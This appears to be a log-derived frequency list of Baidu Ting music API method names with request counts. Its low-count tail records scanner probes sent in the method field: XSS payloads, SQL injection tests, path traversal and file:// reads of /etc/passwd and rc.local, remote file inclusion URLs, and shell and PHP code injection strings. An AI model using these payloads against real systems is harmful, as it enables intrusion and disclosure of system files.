baidu.ting.song.getInfos	61028124
baidu.ting.song.baseInfo	28082757
baidu.ting.search.lrcpic	21488061
baidu.ting.search.catalogSug	20765352
baidu.ting.user.listenAge	16804973
baidu.ting.song.play	15767947
baidu.ting.search.common	14897701
baidu.ting.song.down	8805499
baidu.ting.song.lry	6915795
baidu.ting.billboard.billList	6323191
baidu.ting.song.getInfo	5928358
baidu.ting.user.getUserBaseInfo	5706672
baidu.ting.artist.getSongList	5416500
baidu.ting.search.getPhotoInfos	5110308
baidu.ting.search.lrcys	5047335
baidu.ting.artist.getList	4742798
baidu.ting.user.checkSuggestVersion	4545366
ting.baidu.diy.getPlaylists	4518664
baidu.ting.user.checkComVersion	2982823
baidu.ting.diy.gedanInfo	2840453
baidu.ting.game.gamedetail	2800471
baidu.ting.artist.getInfo	2743916
baidu.ting.plaza.getRecommendAlbum	2620253
baidu.ting.plaza.getFocusPic	2592228
baidu.ting.plaza.active	2522790
baidu.ting.radio.playAction	2494269
baidu.ting.active.start	1969211
baidu.ting.user.config	1923347
baidu.ting.artist.getinfo	1400176
baidu.ting.search.suggestion	1379190
baidu.ting.diy.getNowOfficalList	1361296
baidu.ting.favorite.isCollect	1301893
baidu.ting.album.getAlbumInfo	1276117
baidu.ting.favorite.getCollectSong	1262950
baidu.ting.diy.gedanHot	1225404
baidu.ting.radio.getChannelSong	1220614
baidu.ting.diy.addListenCount	911437
baidu.ting.song.playAAC	902072
baidu.ting.diy.category	867951
baidu.ting.artist.getAlbumList	859619
ting.baidu.plaza.recdaily	850299
baidu.ting.plaza.recdaily	810132
baidu.ting.plaza.getPartDesc	809888
baidu.ting.song.audio	803742
baidu.ting.tag.songlist	706952
baidu.ting.diy.gedan	644688
baidu.ting.tag.getHotTag	616352
	586762
baidu.ting.user.down	541608
baidu.ting.user.RegistToImsg	524294
baidu.ting.diy.getSongFromOfficalList	488591
baidu.ting.radio.getCategoryList	444096
baidu.ting.search.getPhotoInfo	386212
baidu.ting.feedback.song	368480
baidu.ting.search.lrcyss	350875
baidu.ting.billboard.billCategory	337974
baidu.ting.artist.get72HotArtist	284688
baidu.ting.diy.getPlaylists	256440
baidu.ting.favorite.getFavoriteSong	197618
baidu.ting.song.buffer	169554
baidu.ting.plaza.recommend	169179
baidu.ting.game.gamelist	146957
baidu.ting.video.getList	146010
baidu.ting.song.getMulInfos	133385
baidu.ting.favorite.addSongFavorites	128210
baidu.ting.tag.getAllTag	108884
baidu.ting.diy.search	106115
baidu.ting.user.nplogin	99873
baidu.ting.diy.getSimilarGedan	90716
baidu.ting.diy.getOfficialDiyList	87668
baidu.ting.video.play	74471
baidu.ting.favorite.addSongFavorite	57935
baidu.ting.artist.getSpecialSongList	56926
baidu.ting.user.checkVersion	47876
baidu.ting.plaza.getNewSongs	46170
baidu.ting.favorite.delCollectSong	44400
ting.baidu.diy.getPlaylist	30672
baidu.ting.radio.getArtistChannelSong	26147
baidu.ting.radio.getFavoriteSong	24271
baidu.ting.plaza.getArtistPlaza	19010
baidu.ting.diy.getPlaylist	18060
baidu.ting.radio.serv	17601
baidu.ting.artist.getHighSongTitle	14173
baidu.ting.feedback.crash	12190
baidu.ting.album.getList	11309
baidu.ting.diy.saveList	10616
ting.baidu.film.getFilmInfo	9297
baidu.ting.favorite.delSongFavorite	8303
baidu.ting.artist.getQianQianArtist	7956
baidu.ting.song.cloud	7337
baidu.ting.song.getMulInfo	7329
ting.baidu.song.lry	6757
baidu.ting.diy.addListSong	5275
baidu.ting.video.category	4667
baidu.ting.user.logout	4469
baidu.ting.diy.delListSong	4258
baidu.ting.user.regPassport	4135
baidu.ting.weixin.response	4101
baidu.ting.diy.delList	3797
baidu.ting.billboard.catalog	3672
baidu.ting.colorRing.listen	3654
baidu.ting.artist.getHighSongList	3330
ting.baidu.artistapp.renum	3289
baidu.ting.user.getMobileVcode	2943
baidu.ting.colorRing.getCode	2676
baidu.ting.colorRing.authset	2118
baidu.ting.user.getMessage	1940
baidu.ting.favorite.delSongFavorites	1863
baidu.ting.user.registToUC	1601
baidu.ting.favorite.getFavoriteAlbum	1533
baidu.ting.feedback.info	1533
baidu.ting.diy.getRecommendSpeical	1440
baidu.ting.artist.getSongVote	1439
baidu.ting.artist.getSongRank	1394
baidu.ting.artist.getSong	1387
ting.baidu.artistapp.brief	1366
baidu.ting.diy.upList	1065
baidu.ting.favorite.getListenHistory	753
baidu.ting.diy.addList	696
baidu.ting.game.catalog	625
baidu.ting.video.recMv	570
baidu.ting.favorite.getOffenListenList	467
baidu.ting.song.getSuoSongInfo	436
baidu.ting.user.activate	369
baidu.ting.artist.getInfoByName	339
baidu.ting.colorRing.toneselect	331
baidu.ting.colorRing.subscribe	319
baidu.ting.game.gameplay	291
baidu.ting.artistapp.photo	225
baidu.ting.mv.playMV	203
baidu.ting.favorite.getInfoFromView	194
ting.baidu.artistapp.newList	188
baidu.ting.user.login	181
ting.baidu.artistapp.news	158
baidu.ting.plaza.getMisNewSong	128
baidu.ting.mv.getIndexMV	127
baidu.ting.song.getHash	123
baidu.ting.favorite.addAlbumFavorite	121
baidu.ting.mv.searchMV	71
baidu.ting.user.addPassportInfo	66
baidu.ting.favorite.delAlbumFavorite	59
baidu.ting.album.getAlbumstyle	45
ting.baidu.artistapp.briefs	22
ting.baidu.billboard.billcategory	18
baidu.ting.mv.getMultiSongMVInfo	16
 /v8  ADw-script AD4-sslx=812812 ADw-/script AD4- nonxss	12
ting.baidu.artistapp.send	10
baidu.ting.artist.getInfoList	9
ting.baidu.active.issue	8
ting.baidu.user.getUserBaseInfo	8
ting.baidu.game.gamedetail	6
baidu.ting.outerPassport.profile	6
baidu.ting.mv.getMVCategory	5
ting.baidu.song.play	4
ting.baidu.song.audio	3
baidu.ting.favorite.getFavoriteSongCount	3
ting.baidu.game.catalog	3
(	3
ting.baidu.plaza.recommend	3
ting.baidu.feedback.crash	3
ting.baidu.plaza.active	3
\' (	3
ting.baidu.search.playback	3
baidu.ting.song.playabcdc>>>>>\'\'\'\'\'\"\"\"\"\";;;	3
baidu.ting.song.gepInfos	3
ting.baidu.diy.gedan	3
ting.baidu.active.homeList	2
baidu.ting.song.play\';alert(1);\'	2
http://10.42.7.217/?1384272414.42	2
http://cirt.lnet/rfiinc.txt_	1
baidu.ting.song.play\'>\"></title></textarea></script><img src=a onerror=alert(1)>	1
baidu.ting.song.play<scrip<script>t>window.a==1?1:alert(1)</scrip</script>t>	1
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_.jpg	1
baidu.ting.song.play\'>\\\';</script>>\\\"><script>alert(1)</script>\'	1
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local	1
baidum	1
http://cirt.lnet/rfiinc.txt	1
${@print(md5(812812))}	1
baidu.ting.song.play</textarea></title><script>alert(1)</script>	1
baidu.ting.song.play--></script><script>alert(1)</script>	1
../../../../../../../../../../etc/rc.d/rc.local_.jpg	1
baidu.ting.song.play\"><img src=1 onerror=alert(1)>	1
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_.php	1
baidu.tine.song.getInfos	1
baidu.ting.song.play%\' and 8281=8281 and \'%\'=\'	1
baidu.ting.song.play</script><script>alert(1);//	1
../../../../../../../../../../etc/rc.d/rc.local_	1
../../../../../../../../../../etc/rc.d/rc.local	1
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==_	1
data://text/plain;base64,W0hlbGxvIEFpc2h5XQ==	1
baid5.ting.song.getInfos	1
baidu.ting.song.play\') and 8288=8288 and (\'	1
../../../../../../../../../../etc/passwd_.jpg	1
baidu.ting.song.play\'/**/<scr/**/ipt>/**/>	1
baidu.ting.song.play(\')\'))(\")\'\"\"\"\")	1
baidu.ting.song.play\' and \'8281\'=\'8281	1
../../../../../../../../../../etc/passwd_	1
../../../../../../../../../../etc/passwd	1
set	1
baidu.ting.song.playjavascript:alert(1)	1
file:///etc/rc.d/rc.local_	1
baidu.ting.song.play\'\";alert(1);//	1
file:///etc/passwd_.php	1
c:/windows/win.ini_.jpg	1
file:///etc/passwd	1
baidu.ting.video.getListcategoryId=2pn=1rn=20	1
/usr/bin/id;	1
baidu.ting.song.play\";alert(1);\"	1
1\\\";cat /etc/rc.d/rc.local;\\\"	1
baidu.ting.song.play<script>confirm(1)</script>	1
http://cirt.lnet/rfiinc.txt_.jpg	1
baidu.ting.song.play;alert(1);//	1
file:///etc/rc.d/rc.local	1
baidu.ting.search.gAD_å²_	1
c:/windows/win.ini	1
baidu.ting.diy.getDiy	1
string:{var_dump(md5(812812))}	1
baidu.ting.song.play>\'>\"><script>alert(1)</script>	1
file:///etc/rc.d/rc.local_.php	1
1;cat /etc/rc.d/rc.local;	1
file:///etc/passwd_	1
%{	1
${	1
\'];${@print(md5(812812))};//	1
1\';cat /etc/rc.d/rc.local;\'	1
../../../../../../../../../../sbin/../etc/./rc.d/../rc.d/.././rc.local_	1
baidu.ting.slng.getInfos	1
c:/windows/win.ini_	1
baidu.tijson	1
baidu.ting.song.play\"\'><body id=ssltest title=alert(1) onload=eval(ssltest.title)>	1
baidu.ting.artist.getSongListformat=jsontinguid=7994limits=50order=2offset=24from=iosversion=4.3.0from=ios	1
